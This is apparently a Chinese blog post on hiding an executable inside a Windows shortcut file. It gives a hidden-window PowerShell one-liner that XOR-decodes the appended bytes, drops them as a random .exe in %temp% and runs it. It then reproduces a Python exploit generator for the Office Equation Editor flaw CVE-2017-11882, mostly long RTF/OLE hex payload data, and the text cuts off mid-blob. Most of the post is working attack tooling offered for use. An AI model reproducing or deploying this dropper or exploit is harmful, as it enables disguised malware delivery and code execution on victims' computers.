前言

本文希望借鉴lnk捆绑执行exe的方式,利用已有poc代码605字节/17k字节版本Poc实现本地捆绑,还有很多不足的地方需要修改,只是一次尝试

本地捆绑

快捷方式捆绑文件配合已有的poc代码,利用powershell命令释放捆绑文件并执行

注:

  • PowerShell Get-Content用于在指定位置获取项目的内容。 gccattype是该cmdlet的别名
  • cmd输入cmd.exe提示无法运行该程序,可以看看当前执行路径是不是有cmd.exe,删掉即可

理想代码

注:^是转义符,有的地方报错可以直接删掉

1
cmd /c powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq [TOTAL_LNK_FILE_SIZE]} ^| Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file^| select -Skip [LNK_FILE_SIZE_EXCLUDING_EXE])) -Encoding Byte; ^& $path;

实际使用

由于引号冲突,所以我在poc里面使用长字符串将-c参数直接设置成需要的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
#!/usr/bin/env python
# Original poc :https://github.com/embedi/CVE-2017-11882
# This version accepts a command with 17967 bytes long in maximum.
# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.
# But that's enough for exploitation. I bet your shellcode is shorter.:)

__author__ = "@unamer"

import argparse
from struct import pack

head17k = r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000B0000004571756174696F6E2E3300000000000000000000540000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFFFEFFFFFFFEFFFFFF060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C00000000000004600000000000000000000000070B01C713B64D30103000000000100000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201FFFFFFFF04000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000500000087460000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
'''

tail17k = r'''000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C455049435400F6750000D58CFFFF6A2E00000800F6752B7300000100090000033117000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C024080006B1200000026060F001A00FFFFFFFF000010000000C0FFFFFF1E000000C06A00005E8000000B00000026060F000C004D617468547970650000E01F1C000000FB0280FE0000000000009001010000000402001054696D6573204E657720526F6D616E00FEFFFFFF21160A6300000A0000000000040000002D01000008000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320A087FBA340100000061000C000000320A087F3A2D0A000000616161616161616161610C000000320A087FBA250A000000616161616161616161610C000000320A087F3A1E0A000000616161616161616161610C000000320A087FBA160A000000616161616161616161610C000000320A087F3A0F0A000000616161616161616161610C000000320A087FBA070A000000616161616161616161610C000000320A087F3A000A0000006161616161616161616108000000320AC87CBA340100000061000C000000320AC87C3A2D0A000000616161616161616161610C000000320AC87CBA250A000000616161616161616161610C000000320AC87C3A1E0A000000616161616161616161610C000000320AC87CBA160A000000616161616161616161610C000000320AC87C3A0F0A000000616161616161616161610C000000320AC87CBA070A000000616161616161616161610C000000320AC87C3A000A0000006161616161616161616108000000320A887ABA340100000061790C000000320A887A3A2D0A000000616161616161616161610C000000320A887ABA250A000000616161616161616161610C000000320A887A3A1E0A000000616161616161616161610C000000320A887ABA160A000000616161616161616161610C000000320A887A3A0F0A000000616161616161616161610C000000320A887ABA070A000000616161616161616161610C000000320A887A3A000A0000006161616161616161616108000000320A4878BA340100000061000C000000320A48783A2D0A000000616161616161616161610C000000320A4878BA250A000000616161616161616161610C000000320A48783A1E0A000000616161616161616161610C000000320A4878BA160A000000616161616161616161610C000000320A48783A0F0A000000616161616161616161610C000000320A4878BA070A000000616161616161616161610C000000320A48783A000A0000006161616161616161616108000000320A0876BA340100000061000C000000320A08763A2D0A000000616161616161616161610C000000320A0876BA250A000000616161616161616161610C000000320A08763A1E0A000000616161616161616161610C000000320A0876BA160A000000616161616161616161610C000000320A08763A0F0A000000616161616161616161610C000000320A0876BA070A000000616161616161616161610C000000320A08763A000A0000006161616161616161616108000000320AC873BA340100000061000C000000320AC8733A2D0A000000616161616161616161610C000000320AC873BA250A000000616161616161616161610C000000320AC8733A1E0A000000616161616161616161610C000000320AC873BA160A000000616161616161616161610C000000320AC8733A0F0A000000616161616161616161610C000000320AC873BA070A000000616161616161616161610C000000320AC8733A000A0000006161616161616161616108000000320A8871BA340100000061000C000000320A88713A2D0A000000616161616161616161610C000000320A8871BA250A000000616161616161616161610C000000320A88713A1E0A000000616161616161616161610C000000320A8871BA160A000000616161616161616161610C000000320A88713A0F0A000000616161616161616161610C000000320A8871BA070A000000616161616161616161610C000000320A88713A000A0000006161616161616161616108000000320A486FBA340100000061000C000000320A486F3A2D0A000000616161616161616161610C000000320A486FBA250A000000616161616161616161610C000000320A486F3A1E0A000000616161616161616161610C000000320A486FBA160A000000616161616161616161610C000000320A486F3A0F0A000000616161616161616161610C000000320A486FBA070A000000616161616161616161610C000000320A486F3A000A0000006161616161616161616108000000320A086DBA340100000061000C000000320A086D3A2D0A000000616161616161616161610C000000320A086DBA250A000000616161616161616161610C000000320A086D3A1E0A000000616161616161616161610C000000320A086DBA160A000000616161616161616161610C000000320A086D3A0F0A000000616161616161616161610C000000320A086DBA070A000000616161616161616161610C000000320A086D3A000A0000006161616161616161616108000000320AC86ABA340100000061000C000000320AC86A3A2D0A000000616161616161616161610C000000320AC86ABA250A000000616161616161616161610C000000320AC86A3A1E0A000000616161616161616161610C000000320AC86ABA160A000000616161616161616161610C000000320AC86A3A0F0A000000616161616161616161610C000000320AC86ABA070A000000616161616161616161610C000000320AC86A3A000A0000006161616161616161616108000000320A8868BA340100000061000C000000320A88683A2D0A000000616161616161616161610C000000320A8868BA250A000000616161616161616161610C000000320A88683A1E0A000000616161616161616161610C000000320A8868BA160A000000616161616161616161610C000000320A88683A0F0A000000616161616161616161610C000000320A8868BA070A000000616161616161616161610C000000320A88683A000A0000006161616161616161616108000000320A4866BA340100000061000C000000320A48663A2D0A000000616161616161616161610C000000320A4866BA250A000000616161616161616161610C000000320A48663A1E0A000000616161616161616161610C000000320A4866BA160A000000616161616161616161610C000000320A48663A0F0A000000616161616161616161610C000000320A4866BA070A000000616161616161616161610C000000320A48663A000A0000006161616161616161616108000000320A0864BA340100000061000C000000320A08643A2D0A000000616161616161616161610C000000320A0864BA250A000000616161616161616161610C000000320A08643A1E0A000000616161616161616161610C000000320A0864BA160A000000616161616161616161610C000000320A08643A0F0A000000616161616161616161610C000000320A0864BA070A000000616161616161616161610C000000320A08643A000A0000006161616161616161616108000000320AC861BA340100000061000C000000320AC8613A2D0A000000616161616161616161610C000000320AC861BA250A000000616161616161616161610C000000320AC8613A1E0A000000616161616161616161610C000000320AC861BA160A000000616161616161616161610C000000320AC8613A0F0A000000616161616161616161610C000000320AC861BA070A000000616161616161616161610C000000320AC8613A000A0000006161616161616161616108000000320A885FBA340100000061000C000000320A885F3A2D0A000000616161616161616161610C000000320A885FBA250A000000616161616161616161610C000000320A885F3A1E0A000000616161616161616161610C000000320A885FBA160A000000616161616161616161610C000000320A885F3A0F0A000000616161616161616161610C000000320A885FBA070A000000616161616161616161610C000000320A885F3A000A0000006161616161616161616108000000320A485DBA340100000061000C000000320A485D3A2D0A000000616161616161616161610C000000320A485DBA250A000000616161616161616161610C000000320A485D3A1E0A000000616161616161616161610C000000320A485DBA160A000000616161616161616161610C000000320A485D3A0F0A000000616161616161616161610C000000320A485DBA070A000000616161616161616161610C000000320A485D3A000A0000006161616161616161616108000000320A085BBA340100000061000C000000320A085B3A2D0A000000616161616161616161610C000000320A085BBA250A000000616161616161616161610C000000320A085B3A1E0A000000616161616161616161610C000000320A085BBA160A000000616161616161616161610C000000320A085B3A0F0A000000616161616161616161610C000000320A085BBA070A000000616161616161616161610C000000320A085B3A000A0000006161616161616161616108000000320AC858BA340100000061000C000000320AC8583A2D0A000000616161616161616161610C000000320AC858BA250A000000616161616161616161610C000000320AC8583A1E0A000000616161616161616161610C000000320AC858BA160A000000616161616161616161610C000000320AC8583A0F0A000000616161616161616161610C000000320AC858BA070A000000616161616161616161610C000000320AC8583A000A0000006161616161616161616108000000320A8856BA340100000061000C000000320A88563A2D0A000000616161616161616161610C000000320A8856BA250A000000616161616161616161610C000000320A88563A1E0A000000616161616161616161610C000000320A8856BA160A000000616161616161616161610C000000320A88563A0F0A000000616161616161616161610C000000320A8856BA070A000000616161616161616161610C000000320A88563A000A0000006161616161616161616108000000320A4854BA340100000061000C000000320A48543A2D0A000000616161616161616161610C000000320A4854BA250A000000616161616161616161610C000000320A48543A1E0A000000616161616161616161610C000000320A4854BA160A000000616161616161616161610C000000320A48543A0F0A000000616161616161616161610C000000320A4854BA070A000000616161616161616161610C000000320A48543A000A0000006161616161616161616108000000320A0852BA340100000061000C000000320A08523A2D0A000000616161616161616161610C000000320A0852BA250A000000616161616161616161610C000000320A08523A1E0A000000616161616161616161610C000000320A0852BA160A000000616161616161616161610C000000320A08523A0F0A000000616161616161616161610C000000320A0852BA070A000000616161616161616161610C000000320A08523A000A0000006161616161616161616108000000320AC84FBA340100000061000C000000320AC84F3A2D0A000000616161616161616161610C000000320AC84FBA250A000000616161616161616161610C000000320AC84F3A1E0A000000616161616161616161610C000000320AC84FBA160A000000616161616161616161610C000000320AC84F3A0F0A000000616161616161616161610C000000320AC84FBA070A000000616161616161616161610C000000320AC84F3A000A0000006161616161616161616108000000320A884DBA340100000061000C000000320A884D3A2D0A000000616161616161616161610C000000320A884DBA250A000000616161616161616161610C000000320A884D3A1E0A000000616161616161616161610C000000320A884DBA160A000000616161616161616161610C000000320A884D3A0F0A000000616161616161616161610C000000320A884DBA070A000000616161616161616161610C000000320A884D3A000A0000006161616161616161616108000000320A484BBA340100000061000C000000320A484B3A2D0A000000616161616161616161610C000000320A484BBA250A000000616161616161616161610C000000320A484B3A1E0A000000616161616161616161610C000000320A484BBA160A000000616161616161616161610C000000320A484B3A0F0A000000616161616161616161610C000000320A484BBA070A000000616161616161616161610C000000320A484B3A000A0000006161616161616161616108000000320A0849BA340100000061000C000000320A08493A2D0A000000616161616161616161610C000000320A0849BA250A000000616161616161616161610C000000320A08493A1E0A000000616161616161616161610C000000320A0849BA160A000000616161616161616161610C000000320A08493A0F0A000000616161616161616161610C000000320A0849BA070A000000616161616161616161610C000000320A08493A000A0000006161616161616161616108000000320AC846BA340100000061000C000000320AC8463A2D0A000000616161616161616161610C000000320AC846BA250A000000616161616161616161610C000000320AC8463A1E0A000000616161616161616161610C000000320AC846BA160A000000616161616161616161610C000000320AC8463A0F0A000000616161616161616161610C000000320AC846BA070A000000616161616161616161610C000000320AC8463A000A0000006161616161616161616108000000320A8844BA340100000061000C000000320A88443A2D0A000000616161616161616161610C000000320A8844BA250A000000616161616161616161610C000000320A88443A1E0A000000616161616161616161610C000000320A8844BA160A000000616161616161616161610C000000320A88443A0F0A000000616161616161616161610C000000320A8844BA070A000000616161616161616161610C000000320A88443A000A0000006161616161616161616108000000320A4842BA340100000061000C000000320A48423A2D0A000000616161616161616161610C000000320A4842BA250A000000616161616161616161610C000000320A48423A1E0A000000616161616161616161610C000000320A4842BA160A000000616161616161616161610C000000320A48423A0F0A000000616161616161616161610C000000320A4842BA070A000000616161616161616161610C000000320A48423A000A0000006161616161616161616108000000320A0840BA340100000061000C000000320A08403A2D0A000000616161616161616161610C000000320A0840BA250A000000616161616161616161610C000000320A08403A1E0A000000616161616161616161610C000000320A0840BA160A000000616161616161616161610C000000320A08403A0F0A000000616161616161616161610C000000320A0840BA070A000000616161616161616161610C000000320A08403A000A0000006161616161616161616108000000320AC83DBA340100000061000C000000320AC83D3A2D0A000000616161616161616161610C000000320AC83DBA250A000000616161616161616161610C000000320AC83D3A1E0A000000616161616161616161610C000000320AC83DBA160A000000616161616161616161610C000000320AC83D3A0F0A000000616161616161616161610C000000320AC83DBA070A000000616161616161616161610C000000320AC83D3A000A0000006161616161616161616108000000320A883BBA340100000061000C000000320A883B3A2D0A000000616161616161616161610C000000320A883BBA250A000000616161616161616161610C000000320A883B3A1E0A000000616161616161616161610C000000320A883BBA160A000000616161616161616161610C000000320A883B3A0F0A000000616161616161616161610C000000320A883BBA070A000000616161616161616161610C000000320A883B3A000A0000006161616161616161616108000000320A4839BA340100000061000C000000320A48393A2D0A000000616161616161616161610C000000320A4839BA250A000000616161616161616161610C000000320A48393A1E0A000000616161616161616161610C000000320A4839BA160A000000616161616161616161610C000000320A48393A0F0A000000616161616161616161610C000000320A4839BA070A000000616161616161616161610C000000320A48393A000A0000006161616161616161616108000000320A0837BA340100000061000C000000320A08373A2D0A000000616161616161616161610C000000320A0837BA250A000000616161616161616161610C000000320A08373A1E0A000000616161616161616161610C000000320A0837BA160A000000616161616161616161610C000000320A08373A0F0A000000616161616161616161610C000000320A0837BA070A000000616161616161616161610C000000320A08373A000A0000006161616161616161616108000000320AC834BA340100000061000C000000320AC8343A2D0A000000616161616161616161610C000000320AC834BA250A000000616161616161616161610C000000320AC8343A1E0A000000616161616161616161610C000000320AC834BA160A000000616161616161616161610C000000320AC8343A0F0A000000616161616161616161610C000000320AC834BA070A000000616161616161616161610C000000320AC8343A000A0000006161616161616161616108000000320A8832BA340100000061790C000000320A88323A2D0A000000616161616161616161610C000000320A8832BA250A000000616161616161616161610C000000320A88323A1E0A000000616161616161616161610C000000320A8832BA160A000000616161616161616161610C000000320A88323A0F0A000000616161616161616161610C000000320A8832BA070A000000616161616161616161610C000000320A88323A000A0000006161616161616161616108000000320A4830BA340100000061000C000000320A48303A2D0A000000616161616161616161610C000000320A4830BA250A000000616161616161616161610C000000320A48303A1E0A000000616161616161616161610C000000320A4830BA160A000000616161616161616161610C000000320A48303A0F0A000000616161616161616161610C000000320A4830BA070A000000616161616161616161610C000000320A48303A000A0000006161616161616161616108000000320A082EBA340100000061000C000000320A082E3A2D0A000000616161616161616161610C000000320A082EBA250A000000616161616161616161610C000000320A082E3A1E0A000000616161616161616161610C000000320A082EBA160A000000616161616161616161610C000000320A082E3A0F0A000000616161616161616161610C000000320A082EBA070A000000616161616161616161610C000000320A082E3A000A0000006161616161616161616108000000320AC82BBA340100000061000C000000320AC82B3A2D0A000000616161616161616161610C000000320AC82BBA250A000000616161616161616161610C000000320AC82B3A1E0A000000616161616161616161610C000000320AC82BBA160A000000616161616161616161610C000000320AC82B3A0F0A000000616161616161616161610C000000320AC82BBA070A000000616161616161616161610C000000320AC82B3A000A0000006161616161616161616108000000320A8829BA340100000061000C000000320A88293A2D0A000000616161616161616161610C000000320A8829BA250A000000616161616161616161610C000000320A88293A1E0A000000616161616161616161610C000000320A8829BA160A000000616161616161616161610C000000320A88293A0F0A000000616161616161616161610C000000320A8829BA070A000000616161616161616161610C000000320A88293A000A0000006161616161616161616108000000320A48273A690200000061610C000000320A4827BA610A000000616161616161616161610C000000320A48273A5A0A000000616161616161616161610C000000320A4827BA520A000000616161616161616161610C000000320A48273A4B0A000000616161616161616161610C000000320A4827BA430A000000616161616161616161610C000000320A48273A3C0A000000616161616161616161610C000000320A4827BA340A000000616161616161616161610C000000320A48273A2D0A000000616161616161616161610C000000320A4827BA250A000000616161616161616161610C000000320A48273A1E0A000000616161616161616161610C000000320A4827BA160A000000616161616161616161610C000000320A48273A0F0A000000616161616161616161610C000000320A4827BA070A000000616161616161616161610C000000320A48273A000A0000006161616161616161616108000000320A0825BA340100000061610C000000320A08253A2D0A000000616161616161616161610C000000320A0825BA250A000000616161616161616161610C000000320A08253A1E0A000000616161616161616161610C000000320A0825BA160A000000616161616161616161610C000000320A08253A0F0A000000616161616161616161610C000000320A0825BA070A000000616161616161616161610C000000320A08253A000A0000006161616161616161616108000000320AC822BA340100000061000C000000320AC8223A2D0A000000616161616161616161610C000000320AC822BA250A000000616161616161616161610C000000320AC8223A1E0A000000616161616161616161610C000000320AC822BA160A000000616161616161616161610C000000320AC8223A0F0A000000616161616161616161610C000000320AC822BA070A000000616161616161616161610C000000320AC8223A000A0000006161616161616161616108000000320A8820BA340100000061000C000000320A88203A2D0A000000616161616161616161610C000000320A8820BA250A000000616161616161616161610C000000320A88203A1E0A000000616161616161616161610C000000320A8820BA160A000000616161616161616161610C000000320A88203A0F0A000000616161616161616161610C000000320A8820BA070A000000616161616161616161610C000000320A88203A000A0000006161616161616161616108000000320A481EBA340100000061610C000000320A481E3A2D0A000000616161616161616161610C000000320A481EBA250A000000616161616161616161610C000000320A481E3A1E0A000000616161616161616161610C000000320A481EBA160A000000616161616161616161610C000000320A481E3A0F0A000000616161616161616161610C000000320A481EBA070A000000616161616161616161610C000000320A481E3A000A0000006161616161616161616108000000320A081CBA340100000061000C000000320A081C3A2D0A000000616161616161616161610C000000320A081CBA250A000000616161616161616161610C000000320A081C3A1E0A000000616161616161616161610C000000320A081CBA160A000000616161616161616161610C000000320A081C3A0F0A000000616161616161616161610C000000320A081CBA070A000000616161616161616161610C000000320A081C3A000A0000006161616161616161616108000000320AC819BA340100000061000C000000320AC8193A2D0A000000616161616161616161610C000000320AC819BA250A000000616161616161616161610C000000320AC8193A1E0A000000616161616161616161610C000000320AC819BA160A000000616161616161616161610C000000320AC8193A0F0A000000616161616161616161610C000000320AC819BA070A000000616161616161616161610C000000320AC8193A000A0000006161616161616161616108000000320A8817BA340100000061610C000000320A88173A2D0A000000616161616161616161610C000000320A8817BA250A000000616161616161616161610C000000320A88173A1E0A000000616161616161616161610C000000320A8817BA160A000000616161616161616161610C000000320A88173A0F0A000000616161616161616161610C000000320A8817BA070A000000616161616161616161610C000000320A88173A000A0000006161616161616161616108000000320A4815BA340100000061000C000000320A48153A2D0A000000616161616161616161610C000000320A4815BA250A000000616161616161616161610C000000320A48153A1E0A000000616161616161616161610C000000320A4815BA160A000000616161616161616161610C000000320A48153A0F0A000000616161616161616161610C000000320A4815BA070A000000616161616161616161610C000000320A48153A000A0000006161616161616161616108000000320A0813BA340100000061610C000000320A08133A2D0A000000616161616161616161610C000000320A0813BA250A000000616161616161616161610C000000320A08133A1E0A000000616161616161616161610C000000320A0813BA160A000000616161616161616161610C000000320A08133A0F0A000000616161616161616161610C000000320A0813BA070A000000616161616161616161610C000000320A08133A000A0000006161616161616161616108000000320AC810BA340100000061000C000000320AC8103A2D0A000000616161616161616161610C000000320AC810BA250A000000616161616161616161610C000000320AC8103A1E0A000000616161616161616161610C000000320AC810BA160A000000616161616161616161610C000000320AC8103A0F0A000000616161616161616161610C000000320AC810BA070A000000616161616161616161610C000000320AC8103A000A0000006161616161616161616108000000320A880EBA340100000061000C000000320A880E3A2D0A000000616161616161616161610C000000320A880EBA250A000000616161616161616161610C000000320A880E3A1E0A000000616161616161616161610C000000320A880EBA160A000000616161616161616161610C000000320A880E3A0F0A000000616161616161616161610C000000320A880EBA070A000000616161616161616161610C000000320A880E3A000A0000006161616161616161616108000000320A480CBA340100000061000C000000320A480C3A2D0A000000616161616161616161610C000000320A480CBA250A000000616161616161616161610C000000320A480C3A1E0A000000616161616161616161610C000000320A480CBA160A000000616161616161616161610C000000320A480C3A0F0A000000616161616161616161610C000000320A480CBA070A000000616161616161616161610C000000320A